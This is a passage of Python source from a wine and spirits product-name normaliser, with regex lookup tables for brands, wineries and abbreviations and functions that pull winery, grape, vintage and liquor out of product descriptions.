'ZThree', 'ZCuvee'], 'zCognac Courvoisier': ['Napolean', 'VS', 'VSOP',
'XO'], 'zCognac Hennessy': ['Paradis', 'Richard', 'VS', 'VSOP', 'XO',
'Master'], 'zCognac Remy': ['1738', 'Louis XIII', 'VSOP', 'XO', 'VS'],
'zRum Ron Zacapa': ['23', 'Negra', 'XO'], 'zRye Hayden': ['Dark',
'Caribbean'], 'zScotch Hibiki Harmony': None, 'zTeq Campo Azul': [
'Extra Anejo', 'Anejo', 'Blanco', 'Reposado'], 'zTeq Casamigos': [
'Extra Anejo', 'Anejo', 'Blanco', 'Reposado'], 'zTeq Casino Azul': [
'Extra Anejo', 'Anejo', 'Blanco', 'Reposado', 'Silver'],
'zTeq Clase Azul': ['Ultra', 'Extra Anejo', 'Anejo', 'Blanco',
'Reposado', 'Mezcal', 'Plata', 'Platino'], 'zTeq Dos Artes': [
'Extra Anejo'], 'zTeq Gran Cava': ['Extra Anejo'], 'zTeq Loma Azul': [
'Extra Anejo', 'Anejo', 'Blanco', 'Reposado'], 'zTeq Partida': [
'Blanco', 'Elegante'], 'zVodka Absolut': ['Citron', 'Mandarin',
'Mandrin', 'Mango', 'Ruby', 'Vanilia', 'Raspberri', 'Grapevine', None],
'zWhiskey J Walker': ['Double Black', 'Black', 'Blue', 'Gold', 'Green',
'Platinum', 'Red', 'Swing', 'White', '18', '21']}
liquorLookup = {'zRum Mt Gay': [('1703 Mst', re.compile('\\b1703\\b', re.
IGNORECASE)), ('BB', re.compile('\\bBlack Barrel\\b', re.IGNORECASE)),
('Eclipse Silver', re.compile('\\bEclipse\\s+Silver\\b', re.IGNORECASE)
), ('Eclipse', re.compile('\\bEclipse\\b', re.IGNORECASE)), ('Old Peat',
re.compile('\\bOld Peat', re.IGNORECASE)), ('Old Pot', re.compile(
'\\bPot\\s+Still\\b', re.IGNORECASE)), ('Old', re.compile('\\bOld\\b',
re.IGNORECASE)), ('Silver', re.compile('\\bSilver\\b', re.IGNORECASE)),
('XO Peat', re.compile('\\bXO\\b', re.IGNORECASE))],
'zScotch Glenmorangie': [('10', re.compile('\\b10(YR)?\\b', re.
IGNORECASE)), ('14 Port', re.compile(
'14.+\\bQuinta\\b|14.+\\bPort\\b|\\bQuinta\\b.+14|\\bPort\\b.+14', re.
IGNORECASE)), ('12 Bacalta', re.compile('\\bBacalta\\b', re.IGNORECASE)
), ('12 Burgundy', re.compile('\\bBurgundy\\b', re.IGNORECASE)), (
'12 Nectar', re.compile('\\bNectar\\b', re.IGNORECASE)), ('12 Port', re
.compile('\\bQuinta\\b|\\bPort\\b', re.IGNORECASE)), ('12 Sherry', re.
compile('\\bLa\\s?Santa\\b|\\bSherry\\b', re.IGNORECASE)), ('12 Signet',
re.compile('\\bSignet\\b', re.IGNORECASE)), ('15 Cadboll', re.compile(
'\\bCadboll', re.IGNORECASE)), ('15', re.compile('\\b15(YR)?\\b', re.
IGNORECASE)), ('18', re.compile('\\b18(YR)?\\b|\\b18YEAR\\b', re.
IGNORECASE)), ('25 Astar', re.compile('\\bAstar\\b', re.IGNORECASE)), (
'25', re.compile('\\b25(YR)?\\b', re.IGNORECASE)), ('Companta', re.
compile('\\bCompanta\\b', re.IGNORECASE)), ('Finealta', re.compile(
'\\bFinealta\\b', re.IGNORECASE)), ('Milsean', re.compile(
'\\bMilsean\\b', re.IGNORECASE)), ('Sonnalta', re.compile(
'\\bSonnalta\\b', re.IGNORECASE))], 'zScotch Macallan': [('10 Fine', re
.compile('\\bFine.*\\b10\\b|\\b10.*Fine')), ('10', re.compile(
'\\b10\\b')), ('12 Double Gold', re.compile(
'\\bDbl\\b.*Gold|\\bDouble\\b.*Gold', re.IGNORECASE)), ('12 Double', re
.compile('\\bDouble\\s.*12(YR)?\\b', re.IGNORECASE)), ('12 Double', re.
compile('\\b12\\s.*Double\\b', re.IGNORECASE)), ('12 Double', re.
compile('\\bDbl\\b|\\bDouble\\b', re.IGNORECASE)), ('12 Edition 1', re.
compile('\\bEdition\\s.*1\\b', re.IGNORECASE)), ('12 Edition 2', re.
compile('\\bEdition\\s.*2\\b', re.IGNORECASE)), ('12 Edition 3', re.
compile('\\bEdition\\s.*3\\b', re.IGNORECASE)), ('12 Edition 4', re.
compile('\\bEdition\\s.*4\\b', re.IGNORECASE)), ('12 Sherry', re.
compile('\\b12\\s.*Sherry\\b|\\bSherry\\b\\s.*\\b12', re.IGNORECASE)),
('12 Triple', re.compile('\\b12(YR)?\\s.*Triple\\b', re.IGNORECASE)), (
'12 Triple', re.compile('\\bTriple\\s.*12\\b', re.IGNORECASE)), ('12',
re.compile('\\b12(YR)?\\b', re.IGNORECASE)), ('15 Triple', re.compile(
'\\b15(YR)?\\s.*Triple\\b|Triple.+\\b15(YR)?\\b', re.IGNORECASE)), (
'15 Fine', re.compile('\\b15(YR)?\\b.*\\bFine\\b', re.IGNORECASE)), (
'15', re.compile('\\b15(YR)?\\b', re.IGNORECASE)), ('17 Sherry', re.
compile('\\b17(YR)?\\s.*Sherry\\b', re.IGNORECASE)), ('17 Fine', re.
compile('\\b17(YR)?\\b.*\\bFine\\b', re.IGNORECASE)), ('17', re.compile
('\\b17(YR)?\\b', re.IGNORECASE)), ('18 Sherry', re.compile(
'\\b18(YR)?\\s.*Sherry\\b|Sherry\\b.*18', re.IGNORECASE)), ('18 Triple',
re.compile('\\b18(YR)?\\s.*Triple\\b|Triple.+\\b18(YR)?\\b', re.
IGNORECASE)), ('18 Fine', re.compile('\\b18(YR)?\\b.*\\bFine\\b', re.
IGNORECASE)), ('18 Gran', re.compile('Gran\\b.*\\b18', re.IGNORECASE)),
('18', re.compile('\\b18(YR)?\\b', re.IGNORECASE)), ('21 Fine', re.
compile('\\b21.*Fine\\b', re.IGNORECASE)), ('21', re.compile(
'\\b21(YR)?\\b', re.IGNORECASE)), ('25 Sherry', re.compile(
'\\b25\\s.*Sherry\\b', re.IGNORECASE)), ('25', re.compile(
'\\b25(YR)?\\b')), ('30 Sherry', re.compile('\\b30\\s.*Sherry', re.
IGNORECASE)), ('30 Triple', re.compile(
'\\b30(YR)?\\s.*Triple\\b|Triple.+\\b30(YR)?\\b', re.IGNORECASE)), (
'30 Fine', re.compile('\\b30(YR)?\\b.*\\bFine\\b|Fine.*30', re.
IGNORECASE)), ('30', re.compile('\\b30(YR)?\\b')), ('Rare', re.compile(
'\\bRare\\b', re.IGNORECASE))], 'zTeq Cuervo': [('Especial Gold', re.
compile('\\bEspecial\\b.*Gold\\b|Gold.*Especial', re.IGNORECASE)), (
'Especial Blue', re.compile('\\bEspecial\\b.*Blue\\b', re.IGNORECASE)),
('Especial', re.compile('\\bEspecial\\b', re.IGNORECASE)), (
'Familia Platino', re.compile('\\bPlatino\\b', re.IGNORECASE)), (
'Familia Anejo', re.compile('\\bFamilia\\b|\\bReserva\\b', re.
IGNORECASE)), ('Gold', re.compile('\\bGold\\b', re.IGNORECASE)), (
'Reposado Lagavulin', re.compile('\\bReposado.*Lagavulin', re.
IGNORECASE)), ('Tradicional Anejo', re.compile(
'Tradicional.*Anejo|Anejo.*Tradicional', re.IGNORECASE)), (
'Tradicional Reposado', re.compile(
'Tradicional.*Reposado|Reposado.*Tradicional', re.IGNORECASE)), (
'Tradicional Silver', re.compile('\\bTradicional\\b', re.IGNORECASE)),
('Tradicional Silver', re.compile('\\bTraditional\\b', re.IGNORECASE)),
('Reposado', re.compile('\\bReposado\\b', re.IGNORECASE)), ('Silver',
re.compile('\\bSilver\\b', re.IGNORECASE))], 'zTeq Don Julio': [('1942',
re.compile('\\b1942\\b', re.IGNORECASE)), ('Real', re.compile(
'\\bReal\\b', re.IGNORECASE)), ('Anejo Claro 70th', re.compile(
'\\b70th\\b', re.IGNORECASE)), ('Anejo Claro', re.compile(
'\\bAnejo\\b\\s*Claro\\b', re.IGNORECASE)), ('Anejo', re.compile(
'\\bAnejo\\b', re.IGNORECASE)), ('Blanco', re.compile('\\bBlanco\\b',
re.IGNORECASE)), ('Reposado Lagavulin', re.compile(
'\\bRepo.+Lagvulin\\b', re.IGNORECASE)), ('Reposado Dbl', re.compile(
'\\bReposado.+Double\\b', re.IGNORECASE)), ('Reposado Dbl', re.compile(
'\\bReposado.+Dbl\\b', re.IGNORECASE)), ('Reposado Dbl', re.compile(
'\\bDouble.+Reposado\\b', re.IGNORECASE)), ('Reposado Private', re.
compile('\\bReposado.+Private\\b', re.IGNORECASE)), ('Reposado', re.
compile('\\bReposado\\b', re.IGNORECASE)), ('Silver', re.compile(
'\\bSilver\\b', re.IGNORECASE))], 'zTeq Herradura': [('Ultra', re.
compile('\\bUltra\\b', re.IGNORECASE)), ('Suprema', re.compile(
'\\bSuprema\\b', re.IGNORECASE)), ('Anejo', re.compile('\\bAnejo\\b',
re.IGNORECASE)), ('Blanco', re.compile('\\bBlanco\\b', re.IGNORECASE)),
('Reposado Gold', re.compile(
'\\bReposado\\s+Gold\\b|\\bGold\\s+Reposado\\b', re.IGNORECASE)), (
'Reposado Scotch', re.compile(
'\\bReposado.+Scotch\\b|\\bScotch.+Reposado\\b', re.IGNORECASE)), (
'Reposado Port', re.compile('\\bPort.+Reposado\\b|\\bReposado.+Port\\b',
re.IGNORECASE)), ('Reposado', re.compile('\\bReposado\\b', re.
IGNORECASE)), ('Silver', re.compile('\\bSilver\\b', re.IGNORECASE))],
'zTeq Patron': [('Gran Piedra', re.compile('\\bPiedra\\b', re.
IGNORECASE)), ('DELETE Roca DELETE', re.compile('\\bRoca\\b', re.
IGNORECASE)), ('Anejo Extra Lalique', re.compile('\\bLalique\\b', re.
IGNORECASE)), ('Anejo Extra 7yr', re.compile(
'\\b7YR\\b|\\b7 anos\\b|\\b7 year\\b', re.IGNORECASE)), (
'Anejo Extra 5yr', re.compile('\\b5YR\\b|\\b5 anos\\b|\\b5 year\\b', re
.IGNORECASE)), ('Anejo Extra 10yr', re.compile(
'\\b10\\b.+\\bExtra\\b|\\bExtra\\b.+10', re.IGNORECASE)), (
'Anejo Extra', re.compile('\\bExtra\\s+Anejo\\b', re.IGNORECASE)), (
'Gran Anejo', re.compile('\\bGran\\s+Anejo\\b', re.IGNORECASE)), (
'Gran Anejo', re.compile('\\bBurdeos\\b', re.IGNORECASE)), (
'Gran Smoky', re.compile('\\bGran\\s+.*Smoky\\b', re.IGNORECASE)), (
'Anejo', re.compile('\\bAnejo\\b', re.IGNORECASE)), ('Gran Platinum',
re.compile('\\bPlatinum\\b', re.IGNORECASE)), ('Reposado', re.compile(
'\\bReposado\\b', re.IGNORECASE)), ('Silver LTD', re.compile(
'\\bSilver.*Limited\\b|\\bLimited.*Silver\\b', re.IGNORECASE)), (
'Silver Estate', re.compile('\\bEstate.*Silver\\b|\\bSilver.*Estate\\b',
re.IGNORECASE)), ('Silver', re.compile('\\bSilver\\b', re.IGNORECASE)),
('Blanco', re.compile('\\bBlanco\\b', re.IGNORECASE))],
'zTeq Padre Azul': [('Blanco', re.compile('\\bsilver\\b', re.IGNORECASE
))], 'zWhiskey Balvenie': [('12 Double', re.compile(
'\\bDouble.*12(YR)?\\b', re.IGNORECASE)), ('12 Double', re.compile(
'\\b12(YR)?\\s.*Double', re.IGNORECASE)), ('12 First', re.compile(
'\\b12(YR)?\\s.*First', re.IGNORECASE)), ('12 USA', re.compile(
'\\b12.*American|American.*12', re.IGNORECASE)), ('12 Toast', re.
compile('\\b12(YR)?\\s.*Toast', re.IGNORECASE)), ('12', re.compile(
'\\b12(YR)?\\b', re.IGNORECASE)), ('14 Carib', re.compile(
'\\b14(YR)?\\s.*Carib', re.IGNORECASE)), ('14 Carib', re.compile(
'\\b14(YR)?\\s.*CB\\s+Cask', re.IGNORECASE)), ('14 Carib', re.compile(
'\\bCarr?ib', re.IGNORECASE)), ('14 Peat', re.compile(
'\\b14(YR)?\\s.*Peat', re.IGNORECASE)), ('15 Sherry', re.compile(
'\\b15(YR)?\\s.*Sherry\\b', re.IGNORECASE)), ('15 Sherry', re.compile(
'\\bSherry\\s+.*15(YR)?\\b', re.IGNORECASE)), ('15', re.compile(
'\\b15(YR)?\\b', re.IGNORECASE)), ('16 Triple', re.compile(
'\\b16(YR)?\\s.*Triple\\b', re.IGNORECASE)), ('17 Sherry Double', re.
compile('\\b17(YR)?\\s.*Sherry\\s+Doub', re.IGNORECASE)), ('17 Sherry',
re.compile('\\b17(YR)?\\s.*Sherry', re.IGNORECASE)), ('17 Double', re.
compile('\\b17(YR)?\\s.*Double', re.IGNORECASE)), ('17 Double', re.
compile('\\bDouble.*17(YR)?\\b', re.IGNORECASE)), ('17 Peat', re.
compile('\\b17(YR)?\\s.*Peat', re.IGNORECASE)), ('17 Peat', re.compile(
'\\bPeat.*17(YR)?\\b', re.IGNORECASE)), ('17', re.compile(
'\\b17(YR)?\\b', re.IGNORECASE)), ('21 Port', re.compile('\\b21.*Port',
re.IGNORECASE)), ('21 Port', re.compile('\\bPort.*21\\b', re.IGNORECASE
)), ('21', re.compile('21', re.IGNORECASE)), ('25', re.compile(
'\\b25(YR)?\\b', re.IGNORECASE)), ('30', re.compile('\\b30(YR)?\\b', re
.IGNORECASE)), ('40', re.compile('\\b40(YR)?\\b', re.IGNORECASE))],
'zBourbon Woodford Res': [('Dbl', re.compile('\\bDouble\\b', re.
IGNORECASE)), ('Derby', re.compile('\\bDerby\\b', re.IGNORECASE)), (
'Rye Choc', re.compile('\\bChocolate.*Rye\\b', re.IGNORECASE)), ('Rye',
re.compile('\\bRye\\b', re.IGNORECASE)), ('Brandy', re.compile(
'\\bBrandy\\b', re.IGNORECASE)), ('Batch', re.compile('\\bBatch\\b', re
.IGNORECASE)), ('Barrel', re.compile('\\bBarrel\\b', re.IGNORECASE)), (
'Master', re.compile('\\bMasters?\\b', re.IGNORECASE)), ('Malt', re.
compile('\\bMalt\\b', re.IGNORECASE)), ('Maple', re.compile(
'\\bMaple\\b', re.IGNORECASE)), ('Wheat', re.compile('\\bWheat\\b', re.
IGNORECASE)), ('', re.compile('\\bWoodford\\b', re.IGNORECASE))],
'zSambuca': [('Romana Black', re.compile(
'\\bRomana.*\\bBlack\\b|\\bBlack\\s+Romana\\b', re.IGNORECASE)), (
'Romana', re.compile('\\bRomana\\b', re.IGNORECASE)), ('Di Amore', re.
compile('\\bdi Amore\\b', re.IGNORECASE))], 'zScotch Hibiki': [('12',
re.compile('\\b12\\s*YE?A?R\\b', re.IGNORECASE)), ('17 Limited', re.
compile('\\b17\\s*YE?A?R\\b.+Limited', re.IGNORECASE)), ('17', re.
compile('\\b17\\s*YE?A?R\\b', re.IGNORECASE)), ('21 Limited', re.
compile('\\b21\\s*YE?A?R\\b.+Limited', re.IGNORECASE)), ('21', re.
compile('\\b21\\s*YE?A?R\\b', re.IGNORECASE)), ('30', re.compile(
'\\b30\\s*YE?A?R\\b', re.IGNORECASE))]}
wineAbbrLookup = {'120-80': '\\bOne\\s+Twenty\\s+Over\\s+Eighty\\b',
'3Amigos': '\\bThree\\s+Amigos\\b', '3Palms': '\\bThree\\s+Palms\\b',
'3Sister': '\\bThree\\s+Sisters?\\b', '4Barrell':
'\\b4[\\-\\s]Barrels?\\b', 'Alex': '\\bAlexander\\b', 'And':
'\\bAnderson\\b', 'Car': '\\bCarneros\\b', 'Carries': '\\bCarrie', 'CC':
'\\bC\\.?C\\.?\\s+Ranch\\b', 'Clone4': '\\bClone\\s+4\\b', 'Clone6':
'\\bClone\\s+6\\b', 'Crossbarn': '\\bCross\\s+Barn\\b', 'Donna':
'\\bDonna', 'Est': '\\bEstate\\b', 'Estate': '\\bEst\\b', 'Gap':
'\\bGap|\\s%27Gap', 'Gary': '\\bGary', 'Julia': '\\bJulia', 'Knights':
'\\bKnight', 'KistlerVnyd': '\\bKistler (Vineyard|VYD|EST)\\b', 'LP':
'\\bLes Pierres\\b', 'Lyn': '\\bLyndenhur?st\\b', 'Mont':
'\\bMonterey\\b', 'Mt': '\\bMount\\b|\\bMt\\.\\b', 'Napa/Son':
'\\bNapa.*Son', 'Oak': '\\bOakville\\b', 'One-Pt-5':
'\\bOne\\s+Point\\s+Five\\b', 'Pomm': '\\bPommeraie\\b', 'Priv':
'\\bPrivate\\b', 'RR': '\\bRussian\\s+Rivers?\\b|RRV', 'RRR':
'\\bRussian\\s+Rivers?\\b|RRV', 'Res':
'\\bReserve\\b|\\bRsv\\b|\\bResrv\\b|\\bReserv\\b|\\bReserve$', 'Rose':
'\\bRosé|\\bROS&EACUTE;|\\bRos%E9', 'Ruth': '\\bRutherford\\b',
'Sandy': '\\bSandy', 'Samanthas': '\\bSamantha', 'SC':
'\\bSanta\\s+Cruz\\b', 'SLD': '\\bStag.*Leap\\b', 'SLH':
'\\bSanta\\s+Lucia\\b', 'SMV': '\\bSanta\\s+Maria|\\bS\\s+Maria', 'SRH':
'\\bSTA\\.?|\\bSANTA\\s+Rita\\b|\\bSTA\\sRITA\\sHILLS|\\bS\\s+RITA\\b',
'SS': '\\bSpecial\\s+Selection\\b', 'Stage': '\\bStagecoach\\b',
'Son': '\\bSonoma\\b', 'SYV': '\\bSanta\\s+Ynez\\s+Valley\\b', 'TD9':
'\\bTD\\s+9\\b|\\bTD-9\\b', 'Terraces': '\\bTerrace', 'TheCutrer':
'\\bThe Cutrer\\b|nnay Cutrer\\b', 'Tok':
'\\bTo[\\s\\-]?Kolan|\\bTo[\\s\\-]?Kalon', 'Turn4': '\\bTurn\\s+4\\b',
'Vernas': '\\bVerna', 'Vine': '\\bVines\\b', 'Yount':
'\\bYountville\\b', 'ZThree': '\\bZ.*\\bThree\\b', 'ZCuvee':
'\\bZ.*\\bCuvee\\b|\\bCuvee Z\\b', 'Agustina': '\\bAugustina\\b',
'Durell': '\\bDurrell\\b', 'Benchland': '\\bBenchlands\\b', 'Pritchard':
'\\bPitchard\\b'}
reShipsAs = re.compile('\\(ships?\\s', re.IGNORECASE)
defaultorderlist = [['Tok'], ['Oak'], ['Res'], ['RR'], ['Landslide'], [
'Yount'], ['RRR'], ['Son'], ['Ruth'], ['Napa'], ['Helena'], ['SRH'], [
'SLH'], ['SMV'], ['SLD'], ['Paso'], ['Alex'], ['Single'], ['Estate']]
def globalVariableCheck(debug=False):
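    # sanity-check the lookup dicts for overlapping winery keys: entries in
    # noGrapeLookup/ignoreGrapeLookup short-circuit processing, so a winery that
    # also appears in liquorLookup would never have its liquor regexes evaluated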
for liquor in liquorLookup:
if liquor in noGrapeLookup:
print(
'WARNING:liquorLookup regexs will never execute - they are in noGrapeLookup:'
, liquor)
if liquor in ignoreGrapeLookup:
print(
'WARNING:liquorLookup regexs will never execute - they are in ignoreGrapeLookup:'
, liquor)
for winery in ignoreGrapeLookup:
if winery in noGrapeLookup:
print(
'WARNING:ignoreGrapeLookup regexs will never execute - they are in noGrapeLookup:'
, winery)
def setOptionDictMasterFldValues(optiondict, debug=False):
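    # default the master-file field-name options to the update-file field names when unset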
for fld in ('fldWine', 'fldWineDescr'):
if not optiondict[fld + 'Master']:
optiondict[fld + 'Master'] = optiondict[fld]
def wineLookupByName(nameLookup, lookupStr, other, msg, wineAbbrLookup=None,
debug=False):
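    # search lookupStr for each name in nameLookup (or its wineAbbrLookup regex);
    # returns the matched name, '' when a None entry says "match nothing",
    # or None when nothing in the list matched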
funcname = 'wineLookupByName:' + msg + ':'
if debug:
print(funcname + 'nameLookup:', nameLookup)
if nameLookup is None:
if debug:
print(funcname + 'match: value is none - continue on')
return ''
for name in nameLookup:
if debug:
print(funcname + 'match-name:', name)
if name is None:
if debug:
print(funcname +
'name-matched: value is none - continue on:pass back blank'
)
return ''
reName = re.compile('\\b' + name + '\\b', re.IGNORECASE)
if reName.search(lookupStr):
if debug:
print(funcname + 'name-MATCHED:', name)
for val in other:
if reName.search(val):
other.remove(val)
if debug:
print(funcname + 'name-remove-from-other:', val)
return name
if wineAbbrLookup and name in wineAbbrLookup:
reName = re.compile(wineAbbrLookup[name], re.IGNORECASE)
if debug:
print(funcname + 'Abbr-match-name:', name)
if reName.search(lookupStr):
if debug:
print(funcname + 'Abbr-name-MATCHED:', wineAbbrLookup[name]
)
for val in other:
if reName.search(val):
other.remove(val)
if debug:
print(funcname + 'name-remove-from-other:', val)
return name
if debug:
print(funcname + 'name match not found:set to blank')
return None
def findQualifier(wine, debug=False):
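    # return the first qualifier (Gift, VAP, Glass, Etch, Basket) whose regex matches
    # the wine string; the leading None entry swallows "Without Gift" strings first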
for val, reSearch in reQualLookup:
if reSearch.search(wine):
if debug:
print('findQualifier:matched-returning:', val)
return val
if debug:
print('findQualifier:no-match-returning:', None)
return None
def findWinery(rec, lastWinery, lastReWinery, fldWine, debug=False):
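    # locate the winery in rec[fldWine]: re-test the winery matched on the prior
    # record first, then fall back to scanning the full wineryLookup list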
if lastWinery:
if debug:
try:
print('fw:new winery:', rec[fldWine])
except Exception as e:
print('debug error8-continuing:', str(e))
print('rec[fldWine]:type:', type(rec[fldWine]))
print('fw:checking if this is lastWinery:', lastWinery)
if lastReWinery.search(rec[fldWine]):
if debug:
print('fw:this matches the last winery')
return lastWinery, lastReWinery
elif debug:
print('fw:not last winery')
for winery, reWinery in wineryLookup:
if debug:
print('fw:not lastWinery-checking winery:', winery)
if fldWine not in rec:
print('not a column in this record fldWine:', fldWine)
print('rec:', rec)
if reWinery.search(rec[fldWine]):
if debug:
print('fw:winery match found:', winery)
return winery, reWinery
return None, None
def findLiquor(rec, winery, fldWine, debug=False):
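    # find the liquor bottling for this winery by scanning liquorLookup[winery]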
for liquor, reLiquor in liquorLookup[winery]:
if debug:
print('fl:checking liquor:', liquor)
if reLiquor.search(rec[fldWine]):
if debug:
print('fl:liquor match found:', liquor)
return liquor, reLiquor
return None, None
def findGrapeByRegex(rec, fldWine, debug=False):
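    # find the grape by matching the grapeLookup regexes against rec[fldWine]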
for grape, reGrape in grapeLookup:
if debug:
print('fgbr:grape:', grape)
if grape is not None and reGrape.search(rec[fldWine]):
if debug:
print('fgbr:grape match found:', grape)
return grape, reGrape
return None, None
def findStrInRecReturnOther(rec, fldWineDescr, findStr, debug=False):
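    # plain substring search for findStr in rec[fldWineDescr]; on a match return
    # (findStr, list of the words that follow it) - the +1 skips the separator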
matchLoc = rec[fldWineDescr].find(findStr)
if matchLoc > -1:
other = rec[fldWineDescr][matchLoc + len(findStr) + 1:].split()
if debug:
print('fsirro:findStr matched:', findStr)
if debug:
print('fsirro:findStr other:', other)
return findStr, other
if debug:
print('fsirro:findStr did not match using:', findStr)
return None, []
def findGrapeByStr(rec, fldWineDescr, debug=False):
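    # find the grape by plain substring match against fldWineDescr (not regex),
    # returning the grape and the trailing words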
for grape, reGrape in grapeLookup:
if debug:
print('fg:grape:', grape)
grape, other = findStrInRecReturnOther(rec, fldWineDescr, grape,
debug=debug)
if grape:
return grape, other
return None, []
def findVintage(rec, fldWine, debug=False):
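    # extract the two-digit vintage from rec[fldWine] via the vintageLookup regexes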
for reVintage in vintageLookup:
m = reVintage.search(rec[fldWine])
if m:
if m.group(1):
vintage = m.group(1)
if debug:
print('fv:vintage-match:', reVintage, ':group1')
elif m.group(2):
vintage = m.group(2)
if debug:
print('fv:vintage-match:', reVintage, ':group2')
elif m.group(3):
vintage = m.group(3)
if debug:
print('fv:vintage-match:', reVintage, ':group3')
else:
vintage = m.group(4)
if debug:
print('fv:vintage-match:', reVintage, ':group4')
return vintage
return None
def buildWineryGrapeLookup(wines, fldWineDescr='winedescr', fldWine='wine',
debug=False):
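    # read the master records and build wgLookup[winery][grape] = list of "other"
    # word lists, sorted longest-first so the most specific match wins later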
wgLookup = {}
lastWinery = None
lastReWinery = None
for rec in wines:
if debug:
print('bwgl:new rec:', rec[fldWineDescr])
if not fldWineDescr in rec:
print('creating-field:', fldWineDescr)
rec[fldWineDescr] = ''
winery = grape = wine = liquor = None
other = []
lastWinery, lastReWinery = winery, reWinery = findWinery(rec,
lastWinery, lastReWinery, fldWine, debug=debug)
if not winery:
if debug:
print('bwgl:did not find winery-skipping:', rec[fldWine])
continue
if winery in ignoreGrapeLookup:
wine = ''
if debug:
print('bwgl:wine check ignoreGrapeLookup on winery:', winery)
elif winery in noGrapeLookup:
if debug:
print('bwgl:wine check noGrapeLookup on winery:', winery)
wine = wineLookupByName(noGrapeLookup[winery], rec[fldWineDescr
], [], 'noGrapeLookup', debug=debug)
if False and wine == '':
if debug:
print('bwgl:nograpelookup:no-match:set wine to None')
wine = None
elif winery in liquorLookup:
if debug:
print('bwgl:liquor check on winery:', winery)
liquor, reLiquor = findLiquor(rec, winery, fldWine, debug=debug)
if liquor is not None:
wine = liquor
if debug:
print('bwgl:liquor found and put in wine:', wine)
if wine is None:
if debug:
print('bwgl:grape check because wine is None')
grape, other = findGrapeByStr(rec, fldWineDescr)
if debug:
print('bwgl:grape:', grape, ':other:', other)
elif debug:
print('bwgl:grape check skipped - we have a wine')
if wine is None and grape is None:
if debug:
print('bwgl:record skipped - no grape or wine defined')
continue
if grape is None:
if debug:
print('bwgl:build other from winery')
wineryFind, other = findStrInRecReturnOther(rec, fldWineDescr,
winery, debug=debug)
if 'case' in other:
other.remove('case')
if debug:
print('bwgl:remove case from other')
if other:
if debug:
print('bwgl:looking at other for quals, bottlesize and vintage'
)
if not other[-1].isdigit():
for qual, reQual in reQualLookup:
if qual == other[-1]:
if debug:
print('bwgl:remove qualifier from other:', qual)
del other[-1]
break
if other and not other[-1].isdigit():
for size, reSize in sizeLookup:
if size == other[-1]:
if debug:
print('bwgl:remove bottlesize from other:', size)
del other[-1]
break
if other and other[-1].isdigit():
if winery in ignoreGrapeLookup and ignoreGrapeLookup[winery
] and other[-1] in ignoreGrapeLookup[winery]:
if debug:
print(
'bwgl:value is in ignoreLookupGrape - keeping it:',
other[-1])
else:
if debug:
print('bwgl:remove vintage from other:', other[-1])
del other[-1]
if wine and wine in other:
other.remove(wine)
if debug:
print('bwgl:remove wine from other:', wine)
if debug:
try:
print('bwgl:Final-Build:', winery, ':', grape, ':', wine,
':', liquor, ':', other, ':', rec[fldWineDescr], ':',
rec[fldWine])
except Exception as e:
print('debug error2-continuing:', str(e))
print('fldWine:', fldWine)
if grape is None and wine is not None:
grape = wine
if debug:
print('bwgl:set-grape-to-wine:', grape)
if debug:
print('bwgl:create wgLookup for winery:', winery, ':grape:', grape)
if winery not in wgLookup:
wgLookup[winery] = {grape: []}
elif grape not in wgLookup[winery]:
wgLookup[winery][grape] = []
if other and other not in wgLookup[winery][grape]:
wgLookup[winery][grape].append(other)
if debug:
print('bwgl:appending to wgLookup:other:', other)
if debug:
print('bwgl:complete-read-of-master-file:sort wgLookup')
for winery in wgLookup:
for grape in wgLookup[winery]:
wgLookup[winery][grape] = sorted(wgLookup[winery][grape], key=
len, reverse=True)
if debug:
print('\n' * 5)
print('START WGLOOKUP DUMPED')
print('#' * 80)
if ppFlag:
pp.pprint(wgLookup)
else:
print('bwgl:final-wgLookup:\n', wgLookup)
print('#' * 80)
return wgLookup
def findAddAttribWgLookup(rec, winery, value, fldWine, AbbrLookup=[],
defaultorderlist=None, valueDescr='', debug=False):
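    # match rec[fldWine] against the word sets in wgLookup[winery][value]:
    # a fully-matched multi-word set wins immediately; single-word matches are
    # collected and the winner is picked via defaultorderlist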
singlematch = []
if debug:
try:
print('faawl:value:', valueDescr, ':match-wgLookup:', rec[
fldWine], ':', wgLookup[winery][value])
except Exception as e:
print('debug error7-continuing:', str(e))
print('fldWine:', fldWine)
for valuematchset in wgLookup[winery][value]:
if debug:
print('faawl:testing valuematchset:', valuematchset, ':length:',
len(valuematchset))
allmatch = True
for valuematch in valuematchset:
reMatch1 = re.compile('\\b' + valuematch + '\\b', re.IGNORECASE)
reMatch2 = re.compile('\\s' + valuematch + '\\s', re.IGNORECASE)
m1 = reMatch1.search(rec[fldWine])
m2 = reMatch2.search(rec[fldWine])
if m1 or m2:
allmatch = True and allmatch
elif valuematch in AbbrLookup:
if debug:
print('faawl:valuematch-abbr:', valuematch, ':',
wineAbbrLookup[valuematch])
reMatch = re.compile(wineAbbrLookup[valuematch], re.IGNORECASE)
allmatch = reMatch.search(rec[fldWine]) and allmatch
else:
allmatch = False and allmatch
if debug:
print('faawl:valuematch:', valuematch, ':allmatch:', allmatch)
if allmatch:
if debug:
print('faawl:value matched:', valuematchset)
if len(valuematchset) == 1:
if debug:
print('faawl:single-valuematch-set-added-to-singlematch:',
valuematchset)
singlematch.append(valuematchset)
else:
if debug:
print('faawl:multivalue-valuematch-set-found:done')
return valuematchset
if not singlematch:
if debug:
print('faawl:exit with singlematch NOT populated return blank')
return []
if debug:
print('faawl:exit with singlematch populated:', singlematch)
if len(singlematch) == 1 or not defaultorderlist:
if debug:
print('faawl:return first entry in singlematch:', singlematch[0])
return singlematch[0]
defaultorder = defaultorderlist[:]
if debug:
print('faawl:multiple single match value-singlematch:', singlematch)
for val in singlematch[::-1]:
if val not in defaultorder:
defaultorder.insert(0, val)
if winery == 'Mondavi' and ['Tok'] in singlematch:
if debug:
print('faawl:Change from:', valuematchset, ':to Tok for mondavi')
return ['Tok']
for val in defaultorder:
if val in singlematch:
if debug:
print('faawl:selected-singlematch-value:', val)
return val
if debug:
print('faawl:valuematchset-empty')
return []
def setWineryDescrFromWineryGrapeLookup(wgLookup, wines, fldWineDescr=
'winedescr', fldWine='wine', fldWineDescrNew='winedescrnew',
fldWineDescrMatch=False, debug=False):
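    # main pass over the update records: derive winery, grape/wine/liquor, vintage,
    # case, size and qualifier, then assemble the result into fldWineDescrNew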
if debug:
print('\n' * 10,
'START WINEDESCR SETTING HERE ---------------------------------------------'
)
for rec in wines:
        winery = grape = wine = vintage = case = size = liquor = nongrape = qual = None
winematchset = grapematchset = []
if debug:
try:
print('setWinery:fldWine:', rec[fldWine])
except Exception as e:
print('debug error2-continuing:', str(e))
print('fldWine:', fldWine)
if fldWineDescrNew not in rec:
